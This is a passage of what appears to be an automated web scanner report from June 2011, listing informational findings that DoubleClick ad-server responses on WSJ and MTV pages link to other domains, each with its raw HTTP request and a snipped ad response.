GET /adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1411
Date: Tue, 14 Jun 2011 00:14:11 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Control_Snippet_creative_w._login_571x47.gif" alt="" width="571" height="47" border="0" usemap="#circ_571x47">
<map name="circ_571x47">
...[SNIP]...
18.14. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 328
Date: Tue, 14 Jun 2011 00:17:53 GMT
Expires: Tue, 14 Jun 2011 00:22:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 topmargin=0><SCRIPT SRC="http://viacom.adbureau.net/jserver/acc_random=3376896/site=mtv.mtvi/aamsz=728x90"></SCRIPT>
...[SNIP]...
18.15. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=btf;tag=adi;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-btf%7Ctag-adi%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2187
Date: Tue, 14 Jun 2011 00:17:53 GMT
Expires: Tue, 14 Jun 2011 00:22:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/CBN/iview/308897570/direct/01/3376896?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/l%3B240346819%3B0-0%3B24%3B65204870%3B4307-300/250%3B41947685/41965472/1%3Bu%3Dfranchise-MTVMusicVideoPicksonOverdrive|franchise-MTVMusicVideoPicksonOverdrive|artist-Mike_Taylor|artist-Mike_Taylor|%21category-expand|%21category-float|%21category-pop|%21category-video|video_id-659420|partner-mv|content_id-1518072|pos-btf|tag-adi|mtype-stan%3B%7Eaopt%3D2/1/c6a3/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
21category-video|video_id-659420|partner-mv|content_id-1518072|pos-btf|tag-adi|mtype-stan%3B%7Eaopt%3D2/1/c6a3/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/CBN/go/308897570/direct/01/3376896" target="_blank"><img border="0" src="http://view.atdmt.com/CBN/view/308897570/direct/01/3376896" /></a>
...[SNIP]...
18.16. http://ad.doubleclick.net/adi/mtv.mtvi/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 293
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:17:17 GMT
Expires: Tue, 14 Jun 2011 00:22:17 GMT
Discarded: true

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 topmargin=0><script src="http://ar.voicefive.com/bmx3/node.pli?pub=mtv"></script>
...[SNIP]...
18.17. http://ad.doubleclick.net/adi/mtv.mtvi/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/mtv.mtvi/survey;sec0=games;sec1=arcade;sec2=;node=survey;sz=1x2;ord=798176392447203500? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 324
Date: Tue, 14 Jun 2011 00:19:16 GMT
Expires: Tue, 14 Jun 2011 00:24:16 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 to
...[SNIP]...
<!-- Adid 206092384-->
<script src="http://content.dl-rms.com/rms/mother/522/nodetag.js"></script>
...[SNIP]...
18.18. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/_hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/_hp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/atf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=atf;tag=adj;mtype=standard;sz=6x6;tile=2;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-atf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-2;ord=892685005487874200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Date: Tue, 14 Jun 2011 00:15:02 GMT
Expires: Tue, 14 Jun 2011 00:20:02 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/o;44306;0-0;0;29374893;490-6/6;0/0/0;u=!category-_hp|!category-float|!category-pop|!category-video|!category-expand|!category-pointroll|pos-atf|tag-adj|mtype-standard|sz-6x6|tile-2;~aopt=2/1/c6a3/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.19. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/shows/_mn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/atf_j_s/shows/_mn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/atf_j_s/shows/_mn;sec0=shows;sec1=_mn;!category=mtv_hub_idx;!category=expand;!category=float;pos=atf;tag=adj;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=1607;demo=1299;demo=858;demo=857;demo=856;demo=850;demo=847;demo=844;demo=790;demo=777;demo=775;u=!category-mtv_hub_idx|!category-expand|!category-float|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-1607|demo-1299|demo-858|demo-857|demo-856|demo-850|demo-847|demo-844|demo-790|demo-777|demo-775;ord=715961970680944900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1850
Date: Mon, 13 Jun 2011 17:46:05 GMT
Expires: Mon, 13 Jun 2011 17:51:05 GMT

document.write('<iframe src=\"http://view.atdmt.com/ULA/iview/310879573/direct/01/7150973?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/i%3B240473810%3B0-0%3B2%3B30277534%3B3454-728/90%3
...[SNIP]...
emo-1299|demo-858|demo-857|demo-856|demo-850|demo-847|demo-844|demo-790|demo-777|demo-775%3B%7Eaopt%3D2/1/c5a3/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/ULA/go/310879573/direct/01/7150973" target="_blank"><img src="http://view.atdmt.com/ULA/view/310879573/direct/01/7150973"/></a>
...[SNIP]...
18.20. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/_hp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=6;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-6;ord=892685005487874200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Tue, 14 Jun 2011 00:15:24 GMT
Expires: Tue, 14 Jun 2011 00:20:24 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');
18.21. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/_hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/_hp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/_hp;sec0=_hp;!category=_hp;!category=float;!category=pop;!category=video;!category=expand;!category=pointroll;pos=btf;tag=adj;mtype=standard;sz=728x90;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-_hp%7C!category-float%7C!category-pop%7C!category-video%7C!category-expand%7C!category-pointroll%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-728x90%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=252368076727725570? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 611
Date: Tue, 14 Jun 2011 00:28:08 GMT
Expires: Tue, 14 Jun 2011 00:33:08 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/l;242147581;0-0;0;36396665;3454-728/90;42461720/42479507/1;u=!category-_hp|!category-float|!category-pop|!categ
...[SNIP]...
x90|tile-3|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-8;~aopt=2/1/c6a3/0;~sscs=%3fhttp://www.vh1storytellerssweeps.com?utm_source=crmhb"><img src="http://s0.2mdn.net/viewad/1807016/03NB_storytellers_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.22. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/games/arcade/game/play

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/games/arcade/game/play;sec0=games;sec1=arcade;sec2=game;sec3=play;!category=games;searchterm=;searchtype=;gamename=exit_path;!category=expand;pos=btf;tag=adj;mtype=standard;sz=6x6;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-games%7Csearchterm-%7Csearchtype-%7Cgamename-exit_path%7C!category-expand%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=898355602286756100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 512
Date: Tue, 14 Jun 2011 00:19:27 GMT
Expires: Tue, 14 Jun 2011 00:24:27 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/v;44306;0-0;0;55567722;490-6/6;0/0/0;u=!category-games|searchterm-|searchtype-|gamename-exit_path|!category-exp
...[SNIP]...
tf|tag-adj|mtype-standard|sz-6x6|tile-3|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|dem;~aopt=2/1/c6a3/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
18.23. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/game/play  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/games/arcade/game/play

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/games/arcade/game/play;sec0=games;sec1=arcade;sec2=game;sec3=play;!category=games;searchterm=;searchtype=;gamename=exit_path;!category=expand;pos=btf;tag=adj;mtype=standard;sz=160x600;tile=4;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-games%7Csearchterm-%7Csearchtype-%7Cgamename-exit_path%7C!category-expand%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-160x600%7Ctile-4%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=898355602286756100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38688
Date: Tue, 14 Jun 2011 00:19:30 GMT
Expires: Tue, 14 Jun 2011 00:24:30 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
emo-1299|demo-850|demo-848|demo-844|demo-827|demo-790%3B%7Eaopt%3D2/1/c6a3/0%3B%7Esscs%3D%3fhttp://pixel.quantserve.com/r;a=p-34ZTMMfbDmJC-;labels=_click.adserver.doubleclick*http://dresslikeaguy.com"><IMG SRC="http://s0.2mdn.net/1807268/PID_1638829_160x600.jpg" width="160" height="600" BORDER=0 alt=""></A>
...[SNIP]...
18.24. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/games/arcade/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/games/arcade/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/games/arcade/index;sec0=games;sec1=arcade;sec2=index;!category=games;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=4;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-games%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-4%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=979672055039554800? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Tue, 14 Jun 2011 00:19:10 GMT
Expires: Tue, 14 Jun 2011 00:24:10 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');
18.25. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/music/_mn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=1x4;tile=4;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-1x4%7Ctile-4%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 176
Date: Tue, 14 Jun 2011 00:17:09 GMT
Expires: Tue, 14 Jun 2011 00:22:09 GMT

document.write('');

document.write('<a target="_blank" href="http://shop.mtv.com/">Find cool stuff for all your favorite shows at the MTV Shop</a>');

document.write('');
